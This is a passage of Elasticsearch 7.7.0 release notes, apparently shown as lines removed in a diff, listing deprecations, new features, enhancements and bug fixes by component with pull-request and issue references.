for invalid realm order config (#51195) {es-pull}51515[#51515] -* Deprecate timeout.tcp_read AD/LDAP realm setting {es-pull}47305[#47305] (issue: {es-issue}46028[#46028]) - -Engine:: -* Deprecate translog retention settings {es-pull}51588[#51588] (issues: {es-issue}45473[#45473], {es-issue}50775[#50775]) - -Features/Features:: -* Add cluster.remote.connect to deprecation info API {es-pull}54142[#54142] (issue: {es-issue}53924[#53924]) - -Infra/Core:: -* Add deprecation check for listener thread pool {es-pull}53438[#53438] (issues: {es-issue}53049[#53049], {es-issue}53317[#53317]) -* Deprecate the logstash enabled setting {es-pull}53367[#53367] -* Deprecate the listener thread pool {es-pull}53266[#53266] (issue: {es-issue}53049[#53049]) -* Deprecate creation of dot-prefixed index names except for hidden and system indices {es-pull}49959[#49959] - -Infra/REST API:: -* Deprecate undocumented alternatives to the nodes hot threads API (#52640) {es-pull}52930[#52930] (issue: {es-issue}52640[#52640]) - -Machine Learning:: -* Renaming inference processor field field_mappings to new name field_map {es-pull}53433[#53433] - -Search:: -* Emit deprecation warning when TermsLookup contains a type {es-pull}53731[#53731] (issue: {es-issue}41059[#41059]) -* Deprecate BoolQueryBuilder's mustNot field {es-pull}53125[#53125] - - - -[[feature-7.7.0]] -[discrete] -=== New features - -Aggregations:: -* Preserve metric types in top_metrics {es-pull}53288[#53288] -* Support multiple metrics in `top_metrics` agg {es-pull}52965[#52965] (issue: {es-issue}51813[#51813]) -* Add size support to `top_metrics` {es-pull}52662[#52662] (issue: {es-issue}51813[#51813]) -* HLRC support for string_stats {es-pull}52163[#52163] -* Add Boxplot Aggregation {es-pull}51948[#51948] (issue: {es-issue}33112[#33112]) - -Analysis:: -* Add nori_number token filter in analysis-nori {es-pull}53583[#53583] - -Authentication:: -* Create API Key on behalf 
of other user {es-pull}52886[#52886] (issue: {es-issue}48716[#48716]) - -Geo:: -* Add support for distance queries on shape queries {es-pull}53468[#53468] -* Add support for distance queries on geo_shape queries {es-pull}53466[#53466] (issues: {es-issue}13351[#13351], {es-issue}39237[#39237]) -* Add support for multipoint shape queries {es-pull}52564[#52564] (issue: {es-issue}52133[#52133]) -* Add support for multipoint geoshape queries {es-pull}52133[#52133] (issue: {es-issue}37318[#37318]) - -Infra/Core:: -* Implement hidden indices {es-pull}50452[#50452] (issues: {es-issue}50251[#50251], {es-issue}50665[#50665], {es-issue}50762[#50762]) - -Infra/Packaging:: -* Introduce aarch64 packaging {es-pull}53914[#53914] - -Machine Learning:: -* Implement ILM policy for .ml-state* indices {es-pull}52356[#52356] (issue: {es-issue}29938[#29938]) -* Add instrumentation to report statistics related to {dfanalytics-jobs} such as -progress, memory usage, etc. {ml-pull}906[#906] -* Multiclass classification {ml-pull}1037[#1037] - -Mapping:: -* Introduce a `constant_keyword` field. {es-pull}49713[#49713] - -SQL:: -* Add `constant_keyword` support {es-pull}53241[#53241] (issue: {es-issue}53016[#53016]) -* Add optimisations for not-equalities {es-pull}51088[#51088] (issue: {es-issue}49637[#49637]) -* Add support for passing query parameters in REST API calls {es-pull}51029[#51029] (issue: {es-issue}42916[#42916]) - -Search:: -* Add a cluster setting to disallow expensive queries {es-pull}51385[#51385] (issue: {es-issue}29050[#29050]) -* Add new x-pack endpoints to track the progress of a search asynchronously {es-pull}49931[#49931] (issue: {es-issue}49091[#49091]) - - - -[[enhancement-7.7.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Fixed rewrite of time zone without DST {es-pull}54398[#54398] -* Try to save memory on aggregations {es-pull}53793[#53793] -* Speed up partial reduce of terms aggregations {es-pull}53216[#53216] (issue: {es-issue}51857[#51857]) -* Simplify SiblingPipelineAggregator {es-pull}53144[#53144] -* Add histogram field type support to boxplot aggs {es-pull}52265[#52265] (issues: {es-issue}33112[#33112], {es-issue}52233[#52233]) -* Percentiles aggregation validation checks for range {es-pull}51871[#51871] (issue: {es-issue}51808[#51808]) -* Begin moving date_histogram to offset rounding (take two) {es-pull}51271[#51271] (issues: {es-issue}50609[#50609], {es-issue}50873[#50873]) -* Password-protected Keystore Feature Branch PR {es-pull}51123[#51123] (issues: {es-issue}32691[#32691], {es-issue}49340[#49340]) -* Implement top_metrics agg {es-pull}51155[#51155] (issue: {es-issue}48069[#48069]) -* Bucket aggregation circuit breaker optimization. 
{es-pull}46751[#46751] - -Analysis:: -* Removes old Lucene's experimental flag from analyzer documentations {es-pull}53217[#53217] - -Authentication:: -* Add exception metadata for disabled features {es-pull}52811[#52811] (issues: {es-issue}47759[#47759], {es-issue}52311[#52311], {es-issue}55255[#55255]) -* Validate role templates before saving role mapping {es-pull}52636[#52636] (issue: {es-issue}48773[#48773]) -* Add support for secondary authentication {es-pull}52093[#52093] -* Expose API key name to the ingest pipeline {es-pull}51305[#51305] (issues: {es-issue}46847[#46847], {es-issue}49106[#49106]) -* Disallow Password Change when authenticated by Token {es-pull}49694[#49694] (issue: {es-issue}48752[#48752]) - -Authorization:: -* Allow kibana_system to create and invalidate API keys on behalf of other users {es-pull}53824[#53824] (issue: {es-issue}48716[#48716]) -* Add "grant_api_key" cluster privilege {es-pull}53527[#53527] (issues: {es-issue}48716[#48716], {es-issue}52886[#52886]) -* Giving kibana user privileges to create custom link index {es-pull}53221[#53221] (issue: {es-issue}59305[#59305]) -* Allow kibana to collect APM telemetry in background task {es-pull}52917[#52917] (issue: {es-issue}50757[#50757]) -* Add the new 'maintenance' privilege containing 4 actions (#29998) {es-pull}50643[#50643] - -Cluster Coordination:: -* Describe STALE_STATE_CONFIG in ClusterFormationFH {es-pull}53878[#53878] (issue: {es-issue}53734[#53734]) - -Distributed:: -* Introduce formal role for remote cluster client {es-pull}53924[#53924] -* Shortcut query phase using the results of other shards {es-pull}51852[#51852] (issues: {es-issue}49601[#49601], {es-issue}51708[#51708]) -* Flush instead of synced-flush inactive shards {es-pull}49126[#49126] (issues: {es-issue}31965[#31965], {es-issue}48430[#48430]) - -Engine:: -* Restore off-heap loading for term dictionary in ReadOnlyEngine {es-pull}53713[#53713] (issues: {es-issue}43158[#43158], {es-issue}51247[#51247]) -* Separate translog from index deletion conditions {es-pull}52556[#52556] -* Always rewrite search shard request outside of the search thread pool {es-pull}51708[#51708] (issue: {es-issue}49601[#49601]) -* Move the terms index of `_id` off-heap. 
{es-pull}52405[#52405] (issue: {es-issue}42838[#42838]) -* Cache completion stats between refreshes {es-pull}51991[#51991] (issue: {es-issue}51915[#51915]) -* Use local checkpoint to calculate min translog gen for recovery {es-pull}51905[#51905] (issue: {es-issue}49970[#49970]) - -Features/CAT APIs:: -* /_cat/shards support path stats {es-pull}53461[#53461] -* Allow _cat indices & aliases to use indices options {es-pull}53248[#53248] (issue: {es-issue}52304[#52304]) - -Features/Features:: -* Enable deprecation checks for removed settings {es-pull}53317[#53317] - -Features/ILM+SLM:: -* Use Priority.IMMEDIATE for stop ILM cluster update {es-pull}54909[#54909] -* Add cluster update timeout on step retry {es-pull}54878[#54878] -* Hide ILM & SLM history aliases {es-pull}53564[#53564] -* Avoid race condition in ILMHistorySotre {es-pull}53039[#53039] (issues: {es-issue}50353[#50353], {es-issue}52853[#52853]) -* Make FreezeStep retryable {es-pull}52540[#52540] -* Make DeleteStep retryable {es-pull}52494[#52494] -* Allow forcemerge in the hot phase for ILM policies {es-pull}52073[#52073] (issue: {es-issue}43165[#43165]) -* Stop policy on last PhaseCompleteStep instead of TerminalPolicyStep {es-pull}51631[#51631] (issue: {es-issue}48431[#48431]) -* Convert ILM and SLM histories into hidden indices {es-pull}51456[#51456] -* Make UpdateSettingsStep retryable {es-pull}51235[#51235] (issues: {es-issue}44135[#44135], {es-issue}48183[#48183]) -* Expose master timeout for ILM actions {es-pull}51130[#51130] (issue: {es-issue}44136[#44136]) -* Wait for active shards on rolled index in a separate step {es-pull}50718[#50718] (issues: {es-issue}44135[#44135], {es-issue}48183[#48183]) -* Adding best_compression {es-pull}49974[#49974] - -Features/Indices APIs:: -* Add IndexTemplateV2 to MetaData {es-pull}53753[#53753] (issue: {es-issue}53101[#53101]) -* Add ComponentTemplate to MetaData {es-pull}53290[#53290] (issue: {es-issue}53101[#53101]) - -Features/Ingest:: -* Reduce log level for pipeline failure {es-pull}54097[#54097] (issue: {es-issue}51459[#51459]) -* Support array for all string ingest processors {es-pull}53343[#53343] (issue: {es-issue}51087[#51087]) -* Add empty_value parameter to CSV processor {es-pull}51567[#51567] -* Add pipeline name to ingest metadata {es-pull}50467[#50467] (issue: {es-issue}42106[#42106]) - -Features/Java High Level REST Client:: -* SourceExists HLRC uses GetSourceRequest instead of GetRequest {es-pull}51789[#51789] (issue: {es-issue}50885[#50885]) -* Add async_search.submit to HLRC {es-pull}53592[#53592] (issue: {es-issue}49091[#49091]) -* Add Get Source API to the HLRC {es-pull}50885[#50885] (issue: {es-issue}47678[#47678]) - -Features/Monitoring:: -* Secure password for monitoring HTTP exporter {es-pull}50919[#50919] (issue: {es-issue}50197[#50197]) -* Validate SSL settings at parse time {es-pull}49196[#49196] (issue: {es-issue}47711[#47711]) - -Features/Watcher:: -* Make watch history indices hidden {es-pull}52962[#52962] (issue: {es-issue}50251[#50251]) -* Upgrade to the latest OWASP HTML sanitizer {es-pull}50765[#50765] (issue: {es-issue}50395[#50395]) - -Infra/Core:: -* Enable helpful null pointer exceptions {es-pull}54853[#54853] -* Allow keystore add to handle multiple settings {es-pull}54229[#54229] (issue: {es-issue}54191[#54191]) -* Report parser name and location in XContent deprecation warnings {es-pull}53805[#53805] -* Report parser name and location in XContent deprecation warnings {es-pull}53752[#53752] -* Deprecate all variants of a ParseField with no 
replacement {es-pull}53722[#53722] -* Allow specifying an exclusive set of fields on ObjectParser {es-pull}52893[#52893] -* Support joda style date patterns in 7.x {es-pull}52555[#52555] -* Implement hidden aliases {es-pull}52547[#52547] (issue: {es-issue}52304[#52304]) -* Allow ObjectParsers to specify required sets of fields {es-pull}49661[#49661] (issue: {es-issue}48824[#48824]) - -Infra/Logging:: -* Capture stdout and stderr to log4j log {es-pull}50259[#50259] (issue: {es-issue}50156[#50156]) - -Infra/Packaging:: -* Use AdoptOpenJDK API to Download JDKs {es-pull}55127[#55127] (issue: {es-issue}55125[#55125]) -* Introduce aarch64 Docker image {es-pull}53936[#53936] (issue: {es-issue}53914[#53914]) -* Introduce jvm.options.d for customizing JVM options {es-pull}51882[#51882] (issue: {es-issue}51626[#51626]) - -Infra/Plugins:: -* Allow sha512 checksum without filename for maven plugins {es-pull}52668[#52668] (issue: {es-issue}52413[#52413]) - -Infra/Scripting:: -* Scripting: Context script cache unlimited compile {es-pull}53769[#53769] (issue: {es-issue}50152[#50152]) -* Scripting: Increase ingest script cache defaults {es-pull}53765[#53765] (issue: {es-issue}50152[#50152]) -* Scripting: Per-context script cache, default off (#52855) {es-pull}53756[#53756] (issues: {es-issue}50152[#50152], {es-issue}52855[#52855]) -* Scripting: Per-context script cache, default off {es-pull}52855[#52855] (issue: {es-issue}50152[#50152]) -* Improve Painless compilation performance for nested conditionals {es-pull}52056[#52056] -* Scripting: Add char position of script errors {es-pull}51069[#51069] (issue: {es-issue}50993[#50993]) - -Infra/Settings:: -* Allow keystore add-file to handle multiple settings {es-pull}54240[#54240] (issue: {es-issue}54191[#54191]) -* Settings: AffixSettings as validator dependencies {es-pull}52973[#52973] (issue: {es-issue}52933[#52933]) - -License:: -* Simplify ml license checking with XpackLicenseState internals {es-pull}52684[#52684] (issue: {es-issue}52115[#52115]) -* License removal leads back to a basic license {es-pull}52407[#52407] (issue: {es-issue}45022[#45022]) -* Refactor license checking {es-pull}52118[#52118] (issue: {es-issue}51864[#51864]) -* Add enterprise mode and refactor {es-pull}51864[#51864] (issue: {es-issue}51081[#51081]) - -Machine Learning:: -* Stratified cross validation split for classification {es-pull}54087[#54087] -* Data frame analytics data counts {es-pull}53998[#53998] -* Verify that the field is aggregatable before attempting cardinality aggregation {es-pull}53874[#53874] (issue: {es-issue}53876[#53876]) -* Adds multi-class feature importance support {es-pull}53803[#53803] -* Data frame analytics analysis stats {es-pull}53788[#53788] -* Add a model memory estimation endpoint for anomaly detection {es-pull}53507[#53507] (issue: {es-issue}53219[#53219]) -* Adds new default_field_map field to trained models {es-pull}53294[#53294] -* Improve DF analytics audits and logging {es-pull}53179[#53179] -* Add indices_options to datafeed config and update {es-pull}52793[#52793] (issue: {es-issue}48056[#48056]) -* Parse and report memory usage for DF Analytics {es-pull}52778[#52778] -* Adds the class_assignment_objective parameter to classification {es-pull}52763[#52763] (issue: {es-issue}52427[#52427]) -* Add reason to DataFrameAnalyticsTask updateState log message {es-pull}52659[#52659] (issue: {es-issue}52654[#52654]) -* Add support for multi-value leaves to the tree model {es-pull}52531[#52531] -* Make ml internal indices hidden {es-pull}52423[#52423] 
(issue: {es-issue}52420[#52420]) -* Add _cat/ml/data_frame/analytics API {es-pull}52260[#52260] (issue: {es-issue}51413[#51413]) -* Adds feature importance option to inference processor {es-pull}52218[#52218] -* Switch poor categorization audit warning to use status field {es-pull}52195[#52195] (issues: {es-issue}50749[#50749], {es-issue}51146[#51146], {es-issue}51879[#51879]) -* Retry persisting DF Analytics results {es-pull}52048[#52048] -* Improve multiline_start_pattern for CSV in find_file_structure {es-pull}51737[#51737] -* Add _cat/ml/trained_models API {es-pull}51529[#51529] (issue: {es-issue}51414[#51414]) -* Add GET _cat/ml/datafeeds {es-pull}51500[#51500] (issue: {es-issue}51411[#51411]) -* Use CSV ingest processor in find_file_structure ingest pipeline {es-pull}51492[#51492] (issue: {es-issue}56038[#56038]) -* Add _cat/ml/anomaly_detectors API {es-pull}51364[#51364] -* Add tags url param to GET {es-pull}51330[#51330] -* Add parsers for inference configuration classes {es-pull}51300[#51300] -* Make datafeeds work with nanosecond time fields {es-pull}51180[#51180] (issue: {es-issue}49889[#49889]) -* Adds support for a global calendars {es-pull}50372[#50372] (issue: {es-issue}45013[#45013]) -* Speed up computation of feature importance -{ml-pull}1005[1005] -* Improve initialization of learn rate for better and more stable results in -regression and classification {ml-pull}948[#948] -* Add number of processed training samples to the definition of decision tree -nodes {ml-pull}991[#991] -* Add new model_size_stats fields to instrument categorization -{ml-pull}948[#948], {es-pull}51879[#51879] (issue: {es-issue}50794[#50749]) -* Improve upfront memory estimation for all data frame analyses, which were -higher than necessary. This will improve the allocation of data frame analyses -to cluster nodes {ml-pull}1003[#1003] -* Upgrade the compiler used on Linux from gcc 7.3 to gcc 7.5, and the binutils -used in the build from version 2.20 to 2.34 {ml-pull}1013[#1013] -* Add instrumentation of the peak memory consumption for {dfanalytics-jobs} -{ml-pull}1022[#1022] -* Remove all memory overheads for computing tree SHAP values {ml-pull}1023[#1023] -* Distinguish between empty and missing categorical fields in classification and -regression model training {ml-pull}1034[#1034] -* Add instrumentation information for supervised learning {dfanalytics-jobs} -{ml-pull}1031[#1031] -* Add instrumentation information for {oldetection} data frame analytics jobs -{ml-pull}1068[#1068] -* Write out feature importance for multi-class models {ml-pull}1071[#1071] -* Enable system call filtering to the native process used with {dfanalytics} -{ml-pull}1098[#1098] - -Mapping:: -* Wildcard field - add normalizer support {es-pull}53851[#53851] -* Append index name for the source of the cluster put-mapping task {es-pull}52690[#52690] - -Network:: -* Give helpful message on remote connections disabled {es-pull}53690[#53690] -* Add server name to remote info API {es-pull}53634[#53634] -* Log when probe succeeds but full connection fails {es-pull}51304[#51304] -* Encrypt generated key with AES {es-pull}51019[#51019] (issue: {es-issue}50843[#50843]) - -Ranking:: -* Adds recall@k metric to rank eval API {es-pull}52577[#52577] (issue: {es-issue}51676[#51676]) - -SQL:: -* JDBC debugging enhancement {es-pull}53880[#53880] -* Transfer version compatibility decision to the server {es-pull}53082[#53082] (issue: {es-issue}52766[#52766]) -* Use a proper error message for queries directed at empty mapping indices 
{es-pull}52967[#52967] (issue: {es-issue}52865[#52865]) -* Use calendar_interval of 1d for HISTOGRAMs with 1 DAY intervals {es-pull}52749[#52749] (issue: {es-issue}52713[#52713]) -* Use a calendar interval for histograms over 1 month intervals {es-pull}52586[#52586] (issue: {es-issue}51538[#51538]) -* Make parsing of date more lenient {es-pull}52137[#52137] (issue: {es-issue}49379[#49379]) -* Enhance timestamp escaped literal parsing {es-pull}52097[#52097] (issue: {es-issue}46069[#46069]) -* Handle uberjar scenario where the ES jdbc driver file is bundled in another jar {es-pull}51856[#51856] (issue: {es-issue}50201[#50201]) -* Verify Full-Text Search functions not allowed in SELECT {es-pull}51568[#51568] (issue: {es-issue}47446[#47446]) -* Extend the optimisations for equalities {es-pull}50792[#50792] (issue: {es-issue}49637[#49637]) -* Add trace logging for search responses coming from server {es-pull}50530[#50530] -* Extend DATE_TRUNC to also operate on intervals(elastic - #46632 ) {es-pull}47720[#47720] (issue: {es-issue}46632[#46632]) - -Search:: -* HLRC: Don't send defaults for SubmitAsyncSearchRequest {es-pull}54200[#54200] -* Reduce performance impact of ExitableDirectoryReader {es-pull}53978[#53978] (issues: {es-issue}52822[#52822], {es-issue}53166[#53166], {es-issue}53496[#53496]) -* Add heuristics to compute pre_filter_shard_size when unspecified {es-pull}53873[#53873] (issue: {es-issue}39835[#39835]) -* Add async_search get and delete APIs to HLRC {es-pull}53828[#53828] (issue: {es-issue}49091[#49091]) -* Increase step between checks for cancellation {es-pull}53712[#53712] (issues: {es-issue}52822[#52822], {es-issue}53496[#53496]) -* Refine SearchProgressListener internal API {es-pull}53373[#53373] -* Check for query cancellation during rewrite {es-pull}53166[#53166] (issue: {es-issue}52822[#52822]) -* Implement Cancellable DirectoryReader {es-pull}52822[#52822] -* Address MinAndMax generics warnings {es-pull}52642[#52642] (issue: {es-issue}49092[#49092]) -* Clarify when shard iterators get sorted {es-pull}52633[#52633] -* Generalize how queries on `_index` are handled at rewrite time {es-pull}52486[#52486] (issues: {es-issue}49254[#49254], {es-issue}49713[#49713]) -* Remove the query builder serialization from QueryShardException message {es-pull}51885[#51885] (issues: {es-issue}48910[#48910], {es-issue}51843[#51843]) -* Short circuited to MatchNone for non-participating slice {es-pull}51207[#51207] -* Add "did you mean" to unknown queries {es-pull}51177[#51177] -* Exclude unmapped fields during max clause limit checking for querying {es-pull}49523[#49523] (issue: {es-issue}49002[#49002]) - -Security:: -* Add error message in JSON response {es-pull}54389[#54389] - -Snapshot/Restore:: -* Use Azure Bulk Deletes in Azure Repository {es-pull}53919[#53919] (issue: {es-issue}53865[#53865]) -* Only link fd* files during source-only snapshot {es-pull}53463[#53463] (issue: {es-issue}50231[#50231]) -* Add Blob Download Retries to GCS Repository {es-pull}52479[#52479] (issues: {es-issue}46589[#46589], {es-issue}52319[#52319]) -* Better Incrementality for Snapshots of Unchanged Shards {es-pull}52182[#52182] -* Add Region and Signer Algorithm Overrides to S3 Repos {es-pull}52112[#52112] (issue: {es-issue}51861[#51861]) -* Allow Parallel Snapshot Restore And Delete {es-pull}51608[#51608] (issue: {es-issue}41463[#41463]) - -Store:: -* HybridDirectory should mmap postings. 
{es-pull}52641[#52641] - -Transform:: -* Transition Transforms to using hidden indices for notifcations index {es-pull}53773[#53773] (issue: {es-issue}53762[#53762]) -* Add processing stats to record the time spent for processing results {es-pull}53770[#53770] -* Create GET _cat/transforms API Issue {es-pull}53643[#53643] (issue: {es-issue}51412[#51412]) -* Add support for script in group_by {es-pull}53167[#53167] (issue: {es-issue}43152[#43152]) -* Implement node.transform to control where to run a transform {es-pull}52712[#52712] (issues: {es-issue}48734[#48734], {es-issue}50033[#50033], {es-issue}52200[#52200]) -* Add support for filter aggregation {es-pull}52483[#52483] (issue: {es-issue}52151[#52151]) -* Provide exponential_avg* stats for batch transforms {es-pull}52041[#52041] (issue: {es-issue}52037[#52037]) -* Improve irrecoverable error detection - part 2 {es-pull}52003[#52003] (issue: {es-issue}51820[#51820]) -* Mark transform API's stable {es-pull}51862[#51862] -* Improve irrecoverable error detection {es-pull}51820[#51820] (issue: {es-issue}50135[#50135]) -* Add support for percentile aggs {es-pull}51808[#51808] (issue: {es-issue}51663[#51663]) -* Disallow fieldnames with a dot at start and/or end {es-pull}51369[#51369] -* Avoid mapping problems with index templates {es-pull}51368[#51368] (issue: {es-issue}51321[#51321]) -* Handle permanent bulk indexing errors {es-pull}51307[#51307] (issue: {es-issue}50122[#50122]) -* Improve force stop robustness in case of an error {es-pull}51072[#51072] - - - -[[bug-7.7.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Fix date_nanos in composite aggs {es-pull}53315[#53315] (issue: {es-issue}53168[#53168]) -* Fix composite agg sort bug {es-pull}53296[#53296] (issue: {es-issue}52480[#52480]) -* Decode max and min optimization more carefully {es-pull}52336[#52336] (issue: {es-issue}52220[#52220]) -* Fix a DST error in date_histogram {es-pull}52016[#52016] (issue: {es-issue}50265[#50265]) -* Use #name() instead of #simpleName() when generating doc values {es-pull}51920[#51920] (issues: {es-issue}50307[#50307], {es-issue}51847[#51847]) -* Fix a sneaky bug in rare_terms {es-pull}51868[#51868] (issue: {es-issue}51020[#51020]) -* Support time_zone on composite's date_histogram {es-pull}51172[#51172] (issues: {es-issue}45199[#45199], {es-issue}45200[#45200]) - -Allocation:: -* Improve performance of shards limits decider {es-pull}53577[#53577] (issue: {es-issue}53559[#53559]) - -Analysis:: -* Mask wildcard query special characters on keyword queries {es-pull}53127[#53127] (issue: {es-issue}46300[#46300]) -* Fix caching for PreConfiguredTokenFilter {es-pull}50912[#50912] (issue: {es-issue}50734[#50734]) - -Audit:: -* Logfile audit settings validation {es-pull}52537[#52537] (issues: {es-issue}47038[#47038], {es-issue}47711[#47711], {es-issue}52357[#52357]) - -Authentication:: -* Fix responses for the token APIs {es-pull}54532[#54532] (issue: {es-issue}53323[#53323]) -* Fix potential bug in concurrent token refresh support {es-pull}53668[#53668] -* Respect runas realm for ApiKey security operations {es-pull}52178[#52178] (issue: {es-issue}51975[#51975]) -* Preserve ApiKey credentials for async verification {es-pull}51244[#51244] -* Don't fallback to anonymous for tokens/apikeys {es-pull}51042[#51042] (issue: {es-issue}50171[#50171]) -* Fail gracefully on invalid token strings {es-pull}51014[#51014] - -Authorization:: -* Explicitly require that delegate API keys have no privileges {es-pull}53647[#53647] -* Allow _rollup_search with read privilege 
{es-pull}52043[#52043] (issue: {es-issue}50245[#50245]) - -CCR:: -* Clear recent errors when auto-follow successfully {es-pull}54997[#54997] -* Put CCR tasks on (data && remote cluster clients) {es-pull}54146[#54146] (issue: {es-issue}53924[#53924]) -* Handle no such remote cluster exception in ccr {es-pull}53415[#53415] (issue: {es-issue}53225[#53225]) -* Fix shard follow task cleaner under security {es-pull}52347[#52347] (issues: {es-issue}44702[#44702], {es-issue}51971[#51971]) - -CRUD:: -* Force execution of finish shard bulk request {es-pull}51957[#51957] (issue: {es-issue}51904[#51904]) -* Block too many concurrent mapping updates {es-pull}51038[#51038] (issue: {es-issue}50670[#50670]) -* Return 429 status code when there's a read_only cluster block {es-pull}50166[#50166] (issue: {es-issue}49393[#49393]) - -Cluster Coordination:: -* Use special XContent registry for node tool {es-pull}54050[#54050] (issue: {es-issue}53549[#53549]) -* Allow static cluster.max_voting_config_exclusions {es-pull}53717[#53717] (issue: {es-issue}53455[#53455]) -* Allow joining node to trigger term bump {es-pull}53338[#53338] (issue: {es-issue}53271[#53271]) -* Ignore timeouts with single-node discovery {es-pull}52159[#52159] - -Distributed:: -* Execute retention lease syncs under system context {es-pull}53838[#53838] (issues: {es-issue}48430[#48430], {es-issue}53751[#53751]) -* Exclude nested documents in LuceneChangesSnapshot {es-pull}51279[#51279] - -Engine:: -* Update translog policy before the next safe commit {es-pull}54839[#54839] (issue: {es-issue}52223[#52223]) -* Fix doc_stats and segment_stats of ReadOnlyEngine {es-pull}53345[#53345] (issues: {es-issue}51303[#51303], {es-issue}51331[#51331]) -* Do not wrap soft-deletes reader for segment stats {es-pull}51331[#51331] (issues: {es-issue}51192[#51192], {es-issue}51303[#51303]) -* Account soft-deletes in FrozenEngine {es-pull}51192[#51192] (issue: {es-issue}50775[#50775]) -* Fixed an index corruption bug that would occur when applying deletes or updates on an index after it has been shrunk. More details can be found on the https://issues.apache.org/jira/browse/LUCENE-9300[corresponding issue]. 
- -Features/CAT APIs:: -* Cat tasks output should respect time display settings {es-pull}54536[#54536] -* Fix NPE in RestPluginsAction {es-pull}52620[#52620] (issue: {es-issue}45321[#45321]) - -Features/ILM+SLM:: -* Ensure error handler is called during SLM retention callback failure {es-pull}55252[#55252] (issue: {es-issue}55217[#55217]) -* Ignore ILM indices in the TerminalPolicyStep {es-pull}55184[#55184] (issue: {es-issue}51631[#51631]) -* Disallow negative TimeValues {es-pull}53913[#53913] (issue: {es-issue}54041[#54041]) -* Fix null config in SnapshotLifecyclePolicy.toRequest {es-pull}53328[#53328] (issues: {es-issue}44465[#44465], {es-issue}53171[#53171]) -* Freeze step retry when not acknowledged {es-pull}53287[#53287] -* Make the set-single-node-allocation retryable {es-pull}52077[#52077] (issue: {es-issue}43401[#43401]) -* Fix the init step to actually be retryable {es-pull}52076[#52076] - -Features/Indices APIs:: -* Read the index.number_of_replicas from template so that wait_for_active_shards is interpreted correctly {es-pull}54231[#54231] - -Features/Ingest:: -* Fix ingest pipeline _simulate api with empty docs never returns a response {es-pull}52937[#52937] (issue: {es-issue}52833[#52833]) -* Handle errors when evaluating if conditions in processors {es-pull}52543[#52543] (issue: {es-issue}52339[#52339]) -* Fix delete enrich policy bug {es-pull}52179[#52179] (issue: {es-issue}51228[#51228]) -* Fix ignore_missing in CsvProcessor {es-pull}51600[#51600] -* Missing suffix for German Month "Juli" in Grok Pattern MONTH {es-pull}51591[#51591] (issue: {es-issue}51579[#51579]) -* Don't overwrite target field with SetSecurityUserProcessor {es-pull}51454[#51454] (issue: {es-issue}51428[#51428]) - -Features/Java High Level REST Client:: -* Add unsupported parameters to HLRC search request {es-pull}53745[#53745] -* Fix AbstractBulkByScrollRequest slices parameter via Rest {es-pull}53068[#53068] (issue: {es-issue}53044[#53044]) -* Send the fields param via body instead of URL params (elastic#42232) {es-pull}48840[#48840] (issues: {es-issue}42232[#42232], {es-issue}42877[#42877]) - -Features/Java Low Level REST Client:: -* Fix roles parsing in client nodes sniffer {es-pull}52888[#52888] (issue: {es-issue}52864[#52864]) - -Features/Monitoring:: -* Fix NPE in cluster state collector for monitoring {es-pull}52371[#52371] (issue: {es-issue}52317[#52317]) - -Features/Stats:: -* Switch to AtomicLong for "IngestCurrent" metric to prevent negative values {es-pull}52581[#52581] (issues: {es-issue}52406[#52406], {es-issue}52411[#52411]) - -Features/Watcher:: -* Disable Watcher script optimization for stored scripts {es-pull}53497[#53497] (issue: {es-issue}40212[#40212]) -* The watcher indexing listener didn't handle document level exceptions. 
{es-pull}51466[#51466] (issue: {es-issue}32299[#32299]) - -Geo:: -* Handle properly indexing rectangles that crosses the dateline {es-pull}53810[#53810] - -Highlighting:: -* Fix highlighter support in PinnedQuery and added test {es-pull}53716[#53716] (issue: {es-issue}53699[#53699]) - -Infra/Core:: -* Make feature usage version aware {es-pull}55246[#55246] (issues: {es-issue}44589[#44589], {es-issue}55248[#55248]) -* Avoid StackOverflowError if write circular reference exception {es-pull}54147[#54147] (issue: {es-issue}53589[#53589]) -* Fix Joda compatibility in stream protocol {es-pull}53823[#53823] (issue: {es-issue}53586[#53586]) -* Avoid self-suppression on grouped action listener {es-pull}53262[#53262] (issue: {es-issue}53174[#53174]) -* Ignore virtual ethernet devices that disappear {es-pull}51581[#51581] (issue: {es-issue}49914[#49914]) -* Fix ingest timezone logic {es-pull}51215[#51215] (issue: {es-issue}51108[#51108]) - -Infra/Logging:: -* Fix LoggingOutputStream to work on windows {es-pull}51779[#51779] (issue: {es-issue}51532[#51532]) - -Infra/Packaging:: -* Handle special characters and spaces in JAVA_HOME path in elasticsearch-service.bat {es-pull}52676[#52676] -* Limit _FILE env var support to specific vars {es-pull}52525[#52525] (issue: {es-issue}52503[#52503]) -* Always set default ES_PATH_CONF for package scriptlets {es-pull}51827[#51827] (issues: {es-issue}50246[#50246], {es-issue}50631[#50631]) - -Infra/Plugins:: -* Ensure only plugin REST tests are run for plugins {es-pull}53184[#53184] (issues: {es-issue}52114[#52114], {es-issue}53183[#53183]) - -Machine Learning:: -* Fix node serialization on GET df-nalytics stats without id {es-pull}54808[#54808] (issue: {es-issue}54807[#54807]) -* Allow force stopping failed and stopping DF analytics {es-pull}54650[#54650] -* Take more care that normalize processes use unique named pipes {es-pull}54636[#54636] (issue: {es-issue}43830[#43830]) -* Do not fail Evaluate API when the actual and predicted fields' types differ {es-pull}54255[#54255] (issue: {es-issue}54079[#54079]) -* Get ML filters size should default to 100 {es-pull}54207[#54207] (issues: {es-issue}39976[#39976], {es-issue}54206[#54206]) -* Introduce a "starting" datafeed state for lazy jobs {es-pull}53918[#53918] (issue: {es-issue}53763[#53763]) -* Only retry persistence failures when the failure is intermittent and stop retrying when analytics job is stopping {es-pull}53725[#53725] (issue: {es-issue}53687[#53687]) -* Fix number inference models returned in x-pack info API {es-pull}53540[#53540] -* Make classification evaluation metrics work when there is field mapping type mismatch {es-pull}53458[#53458] (issue: {es-issue}53485[#53485]) -* Perform evaluation in multiple steps when necessary {es-pull}53295[#53295] -* Specifying missing_field_value value and using it instead of empty_string {es-pull}53108[#53108] (issue: {es-issue}1034[#1034]) -* Use event.timezone in ingest pipeline from find_file_structure {es-pull}52720[#52720] (issue: {es-issue}9458[#9458]) -* Better error when persistent task assignment disabled {es-pull}52014[#52014] (issue: {es-issue}51956[#51956]) -* Fix possible race condition starting datafeed {es-pull}51646[#51646] (issues: {es-issue}50886[#50886], {es-issue}51302[#51302]) -* Fix possible race condition when starting datafeed {es-pull}51302[#51302] (issue: {es-issue}51285[#51285]) -* Address two edge cases for categorization.GrokPatternCreator#findBestGrokMatchFromExamples {es-pull}51168[#51168] -* Calculate results and snapshot retention 
